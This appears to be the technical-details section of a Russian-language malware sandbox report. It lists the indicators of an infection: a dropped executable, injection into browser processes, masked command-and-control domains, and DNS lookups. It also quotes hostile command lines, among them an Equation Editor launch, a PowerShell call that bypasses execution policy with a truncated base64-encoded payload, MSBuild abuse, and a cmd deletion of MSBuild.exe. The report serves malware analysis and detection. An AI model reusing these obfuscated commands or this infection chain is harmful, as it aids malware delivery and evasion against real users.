Техническая информация
- '' (загружен из сети Интернет)
- 'C:\users\public\69577.exe'
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс firefox.exe, модуль nss3.dll
- Процесс iexplore.exe, модуль wininet.dll
- %WINDIR%\syswow64\autofmt.exe
- C:\users\public\69577.exe
- 'bi#.ly':80
- 'th####downtown.com':80
- 'pa##e.ee':443
- 'co######lubconcierges.com':80
- http://www.li#######llifestyleboxes.com/zuwc/?yz#####################################################################################
- DNS ASK bi#.ly
- DNS ASK th####downtown.com
- DNS ASK pa##e.ee
- DNS ASK bo####bevibesz.com
- DNS ASK co######lubconcierges.com
- DNS ASK li#######llifestyleboxes.com
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAa...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
- '%WINDIR%\syswow64\netstat.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"